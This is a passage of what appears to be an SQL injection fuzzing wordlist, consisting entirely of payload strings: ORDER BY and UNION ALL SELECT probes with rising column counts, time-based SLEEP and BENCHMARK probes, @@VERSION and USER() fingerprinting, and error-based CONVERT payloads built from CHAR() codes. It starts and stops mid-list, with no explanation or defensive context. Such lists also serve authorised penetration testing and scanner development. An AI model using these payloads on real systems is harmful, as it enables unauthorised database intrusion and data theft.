1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- UNION ALL SELECT 1 UNION ALL SELECT 1,2 UNION ALL SELECT 1,2,3 UNION ALL SELECT 1,2,3,4 UNION ALL SELECT 1,2,3,4,5 UNION ALL SELECT 1,2,3,4,5,6 UNION ALL SELECT 1,2,3,4,5,6,7 UNION ALL SELECT 1,2,3,4,5,6,7,8 UNION ALL SELECT 1,2,3,4,5,6,7,8,9 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 UNION ALL SELECT 1# UNION ALL SELECT 1,2# UNION ALL SELECT 1,2,3# UNION ALL SELECT 1,2,3,4# UNION ALL SELECT 1,2,3,4,5# UNION ALL SELECT 1,2,3,4,5,6# UNION ALL SELECT 1,2,3,4,5,6,7# UNION ALL SELECT 1,2,3,4,5,6,7,8# UNION ALL SELECT 1,2,3,4,5,6,7,8,9# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# UNION ALL SELECT 1-- UNION ALL SELECT 1,2-- UNION ALL SELECT 1,2,3-- UNION ALL SELECT 1,2,3,4-- UNION ALL SELECT 1,2,3,4,5-- UNION ALL SELECT 1,2,3,4,5,6-- UNION ALL SELECT 1,2,3,4,5,6,7-- UNION ALL SELECT 1,2,3,4,5,6,7,8-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- UNION SELECT @@VERSION,SLEEP(5),3 UNION SELECT @@VERSION,SLEEP(5),USER(),4 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 UNION SELECT @@VERSION,SLEEP(5),"'3 UNION SELECT @@VERSION,SLEEP(5),"'3'"# UNION SELECT @@VERSION,SLEEP(5),USER(),4# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# UNION ALL SELECT USER()-- UNION ALL SELECT SLEEP(5)-- UNION ALL SELECT USER(),SLEEP(5)-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UNION ALL SELECT NULL-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- UNION ALL SELECT NULL# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))# AND 5650=CONVERT(INT,(UNION ALL 